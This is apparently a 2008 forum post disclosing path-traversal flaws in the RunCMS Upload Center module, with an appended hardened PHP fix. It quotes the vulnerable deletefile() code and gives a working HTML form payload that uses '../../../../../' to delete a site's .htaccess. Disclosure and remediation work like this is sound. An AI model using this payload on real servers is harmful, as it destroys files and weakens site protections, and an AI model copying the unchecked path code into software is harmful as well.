
21.07.2008, 00:05
RunCMS Module Upload Center Delete File Vulnerability
Version: latest -- 1.01
File listing vulnerability
Vulnerable code: /folder.php
PHP code:
function listfiles() {
    global $ucConfig, $xoopsUser, $_GET;
    if (!$xoopsUser) {
        header("Location:".XOOPS_URL."/whyregister.php");
    }
    else {
        // foldername is taken straight from the query string, with no check
        // for "../" or path separators, and glued into filesystem paths
        $foldername = $_GET['foldername'];
        $userfoldername = $xoopsUser->getVar("uid");
        $userfolderpath = "./cache/files/".$userfoldername;
        $imgurl = XOOPS_URL."/modules/uc/cache/files/".$userfoldername."/".$foldername;
        $imgpath = "./cache/files/".$userfoldername."/".$foldername;
        // a traversal in foldername makes this point outside the user's directory
        $subfolderpath = $userfolderpath."/".$foldername;
        $total = dir_stats($userfolderpath);
        .....
Delete File Vulnerability
Vulnerable code: /folder.php
PHP code:
function deletefile() {
    global $xoopsUser, $_POST;
    // both components come from the POST body unfiltered
    $filename = $_POST['filename'];
    $foldername = $_POST['foldername'];
    $userfoldername = $xoopsUser->getVar("uid");
    // the only "check" is that the file exists; "../" in foldername or filename
    // walks out of ./cache/files/<uid>/ and unlink() removes whatever is there
    if ( @file_exists("./cache/files/".$userfoldername."/".$foldername."/".$filename) ) {
        @unlink("./cache/files/".$userfoldername."/".$foldername."/".$filename);
        redirect_header("folder.php?op=listfiles&foldername=".$foldername, 3, _MD_FILEDELETEOK);
    }
}
Code:
<form action="folder.php" method="post">
  <td width="1%" nowrap>
    <input type="hidden" name="op" value="deletefile" />
    <input type="hidden" name="foldername" value="../../../../../" />
    <input type="hidden" name="filename" value=".htaccess" />
    <input type="submit" class="button" value="Delete">
  </td>
</form>
ZAMUT ©
__________________
in the ranks
Last edited by ZAMUT; 21.07.2008 at 00:07..
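A hardened replacement for the deletefile() shown in the post, added here as an example; it is not RunCMS or Upload Center code. It assumes the same layout (./cache/files/<uid>/<folder>/<file>) and the $xoopsUser, redirect_header() and _MD_FILEDELETEOK symbols seen in the post; the helper name uc_resolve_user_file() is made up for this example. The first check alone already defeats the posted payload ("../../../../../" contains a separator); the realpath() check additionally catches symlinks planted inside the upload directory. Refusing names that start with a dot is a policy choice that, among other things, keeps .htaccess out of reach.

```php
<?php
// Added example, not module code. Resolve $file inside $base/$folder and return
// its real path, or null if the request would reach outside the user's directory.
function uc_resolve_user_file(string $base, string $folder, string $file): ?string
{
    // 1. Syntactic check: a folder or file name must be a single plain path
    //    component: non-empty, no '/', '\' or NUL, and not starting with a dot
    //    (rejects '.', '..' and dotfiles such as .htaccess).
    foreach ([$folder, $file] as $name) {
        if ($name === '' || $name[0] === '.' || preg_match('~[/\\\\\0]~', $name)) {
            return null;
        }
    }

    // 2. Semantic check: resolve dot segments and symlinks, then require the
    //    result to sit strictly below the user's base directory.
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null; // user directory does not exist: nothing to delete
    }
    $target = realpath($baseReal . DIRECTORY_SEPARATOR . $folder . DIRECTORY_SEPARATOR . $file);
    if ($target === false || !is_file($target)) {
        return null; // missing, or not a regular file
    }
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null; // resolved outside the user's folder (traversal or symlink)
    }
    return $target;
}

// Hardened counterpart of the vulnerable deletefile() from the post.
function deletefile_hardened()
{
    global $xoopsUser;
    if (!$xoopsUser) {
        header("Location: " . XOOPS_URL . "/whyregister.php");
        exit; // the original redirect falls through; always stop after redirecting
    }
    $filename   = isset($_POST['filename'])   ? (string) $_POST['filename']   : '';
    $foldername = isset($_POST['foldername']) ? (string) $_POST['foldername'] : '';
    // uid is numeric; casting keeps the base path free of user-controlled text
    $userfolderpath = "./cache/files/" . (int) $xoopsUser->getVar("uid");

    $target = uc_resolve_user_file($userfolderpath, $foldername, $filename);
    if ($target === null) {
        redirect_header("folder.php", 3, "Invalid file name");
        exit;
    }
    unlink($target);
    redirect_header("folder.php?op=listfiles&foldername=" . rawurlencode($foldername), 3, _MD_FILEDELETEOK);
    exit;
}
```

With this in place the posted form (foldername "../../../../../", filename ".htaccess") is rejected twice over: the folder name contains a separator, and even a single "../" that survived would resolve to a path outside $baseReal and fail the prefix comparison. The same helper can guard listfiles(), which builds $subfolderpath from the unchecked foldername in exactly the same way.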